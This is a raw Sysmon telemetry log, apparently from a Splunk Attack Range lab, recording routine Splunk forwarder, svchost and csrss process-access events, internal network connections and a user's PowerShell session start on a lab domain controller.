08:02:27.567{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809429Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:02:27.567{0C1E0330-048F-60E8-0500-00000000D001}412528C:\Windows\system32\csrss.exe{0C1E0330-F713-60EB-BE79-00000000D001}500C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000809428Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:27.552{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F713-60EB-BE79-00000000D001}500C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000809427Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:27.552{0C1E0330-F713-60EB-BE79-00000000D001}500C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000809426Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:27.036{0C1E0330-F712-60EB-BD79-00000000D001}11722516C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x8000000000000000809425Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:25.295{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57395-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 354300x80000000000000001052616Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:20.612{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51172-false10.0.1.12-8000- 
23542300x80000000000000001052615Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:28.200{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B35E07C534B218CF35F4ED7BBE4E5E8A,SHA256=370F36183AF3A8C49896EBA969293528E34ADB5C79C878C04E458C4C81295DDB,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000809456Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:28.427{0C1E0330-F714-60EB-BF79-00000000D001}35522396C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809455Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:28.255{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F714-60EB-BF79-00000000D001}3552C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809454Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:02:28.255{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809453Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:28.255{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809452Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:02:28.255{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809451Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:28.255{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809450Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:02:28.255{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809449Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:28.255{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809448Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:02:28.255{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809447Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:28.255{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809446Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:02:28.255{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809445Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:28.255{0C1E0330-048F-60E8-0500-00000000D001}412528C:\Windows\system32\csrss.exe{0C1E0330-F714-60EB-BF79-00000000D001}3552C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000809444Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:28.255{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F714-60EB-BF79-00000000D001}3552C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000809443Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:28.240{0C1E0330-F714-60EB-BF79-00000000D001}3552C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000809442Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:28.005{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=39CEA89668FE1D5778A67C99566CEF1A,SHA256=F85CA48B56BA124A147A8BF6F109701B92E4AF577D04E6614E2EC093435D40E9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809441Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:02:28.005{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=85E9333A9384C8772F04158332B563EC,SHA256=FDC7799E8ED8C67309D0F5E830128CBC1B576C9A8A0CFFE61F3D4925D39E957F,IMPHASH=00000000000000000000000000000000falsetrue 17141700x80000000000000001052661Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-CreatePipe2021-07-12 08:02:29.961{466BC892-F715-60EB-B77D-00000000CF01}4796\PSHost.132705505495880043.4796.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 23542300x80000000000000001052660Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:29.930{466BC892-F715-60EB-B77D-00000000CF01}4796ATTACKRANGE\bobC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\bob\AppData\Local\Temp\3\__PSScriptPolicyTest_nqit3m51.fdv.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052659Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:29.930{466BC892-F715-60EB-B77D-00000000CF01}4796ATTACKRANGE\bobC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\bob\AppData\Local\Temp\3\__PSScriptPolicyTest_cm210yaz.oef.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000001052658Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:29.899{466BC892-F715-60EB-B77D-00000000CF01}4796C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\bob\AppData\Local\Temp\3\__PSScriptPolicyTest_cm210yaz.oef.ps12021-07-12 08:02:29.899 
10341000x80000000000000001052657Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:29.861{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-F715-60EB-B77D-00000000CF01}4796C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052656Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:29.830{466BC892-F715-60EB-B77D-00000000CF01}47964956C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\windows.storage.dll+1549f7|C:\Windows\System32\windows.storage.dll+154323|C:\Windows\System32\windows.storage.dll+1541a9|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+5b44|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+42aa|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+2f6d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x80000000000000001052655Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:29.830{466BC892-F715-60EB-B77D-00000000CF01}47964956C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\windows.storage.dll+154962|C:\Windows\System32\windows.storage.dll+154323|C:\Windows\System32\windows.storage.dll+1541a9|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+5b44|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+42aa|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+2f6d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052654Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:02:29.830{466BC892-F715-60EB-B77D-00000000CF01}47964956C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+154947|C:\Windows\System32\windows.storage.dll+154323|C:\Windows\System32\windows.storage.dll+1541a9|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+5b44|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+42aa|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+2f6d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052653Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
